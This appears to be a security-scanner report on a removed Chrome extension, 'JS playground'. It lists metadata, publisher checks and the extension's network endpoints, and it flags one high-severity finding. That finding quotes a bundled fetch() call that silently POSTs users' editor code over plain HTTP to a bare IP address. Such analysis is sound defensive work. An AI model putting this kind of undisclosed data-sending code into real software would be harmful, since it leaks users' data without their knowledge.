JS playground

ID: dndbfngnogbaloehcdbedmagjelddakk

Supported Languages

🇺🇸US English

Extension Info & Metadata

Status
Removed
Version
4.4.2
Size
0.35 MB
Rating
4.0/5
Reviews
2
Users
183
Type
Extension
Updated
Jan 22, 2024
Category
Productivity Workflow
Price
Free
Featured
Yes
Visibility
Listed
Mature
No
By Google
No
Trusted
Yes

Publisher Contextual Analysis

Trusted
Author
skus1992View Profile
MX records exist
Yes
Domain exists
Yes
Is disposable
No
Is role-based
No
Mailbox exists
Yes
Total Extensions
7
Active
3
Obsolete
4
Listed
7
Unlisted
0
Total Users
190

JS playground.

Simple Javascript playground for developers. Dark and Light themes. Libraries included: rxjs, lodash, moment. Autocomplete. - Added tabs.

This extension requests no permissions and has no recorded risk factors.

Every time the user types or the component mounts, the full contents of the code editor (`this.state.value`) are POSTed to a bare IP address over plain HTTP with no TLS. The destination `157.230.101.132` is unrelated to any publisher-disclosed domain or well-known SaaS, is not listed under CWS data-collection disclosures, and — given the extension hasn't been updated in ~865 days — the IP may now be owned by a completely different party. Users have no indication their code is leaving the browser.

popup.bundle.js (Line 27684)
fetch("http://157.230.101.132/api/execute", {    method: "POST",    body: JSON.stringify({      str: this.state.value,      lodash: e,      rxjs: t,      moment: n    }),    headers: {      "Content-Type": "application/json"    }  })  .then((e => 404 === e.status ? e.text() : e.json()))  .then((e => {    "string" == typeof e ? this.setState({      error: e,      output: []    }) : this.setState({      output: e,      error: null    }), clearInterval(this.state.intervalRef)  }))  .catch((e => {    clearInterval(this.state.intervalRef)  }))

By severity

Critical0
High1
Medium0
Low0

Versions scanned

None of the 8 scanned versions have more than one unique code-review finding. Counts are unique findings that include each version.

Extension VersionCode Review Findings
No versions with multiple unique findings.

Files with findings

1 distinct path — top paths by unique finding count:

  • popup.bundle.js1
S.No.
Category
Severity
File
Summary
Found in Version
1Data Exfiltration
high
popup.bundle.js (line 27684)Every time the user types or the component mounts, the full contents of the code editor (`this.state.value`) are POSTed to a bare IP address over plain HTTP with no TLS. The destination `157.230.101.132` is unrelated …
URLs
10
IPv4
1
IPv6
0

URLs

View the external URLs this extension communicates with to understand its network activity and data interactions.

Gain full insight into all external connections.

Upgrade for full visibility.

www.w3.org/2000/svghttp://www.w3.org/2000/svg
www.w3.org/1999/xlinkhttp://www.w3.org/1999/xlink
reactjs.org/docs/error-decoder.htmlhttps://reactjs.org/docs/error-decoder.html?invariant=
www.w3.org/XML/1998/namespacehttp://www.w3.org/XML/1998/namespace
www.w3.org/1998/Math/MathMLhttp://www.w3.org/1998/Math/MathML
www.w3.org/1999/xhtmlhttp://www.w3.org/1999/xhtml
reactjs.org-https://reactjs.org
www.googletagmanager.com/gtag/jshttps://www.googletagmanager.com/gtag/js?id=G-27QH1V6S7T
clients2.google.com/service/update2/crxhttps://clients2.google.com/service/update2/crx
157.230.101.132/api/executehttp://157.230.101.132/api/execute

Gain full insight into all external connections.

Upgrade for full visibility.

157.230.101.132
IPv4
-
Version
Size
Is Malicious
Findings
Permhash
4.4.2
Latest
0.35 MB
Malicious
1N/A
4.4.1
0.35 MB
Malicious
N/A
4.3.9
0.32 MB
Malicious
N/A
4.3.8
0.32 MB
Malicious
N/A
4.3.7
0.32 MB
Malicious
N/A
4.3.6
2.90 MB
Malicious
N/A
4.3.5
2.95 MB
Malicious
N/A
4.4.3
0.35 MB
Malicious
N/A
Showing 1 to 8 of 10 rows
Rows per page:

Code Diff

Compare extension code between any two versions.

0 changed files (scanned top 25 shared text files)

No comparable text files found between these versions.

Browse and explore files within this extension package

Gain full insight into all external connections.

Upgrade for full visibility.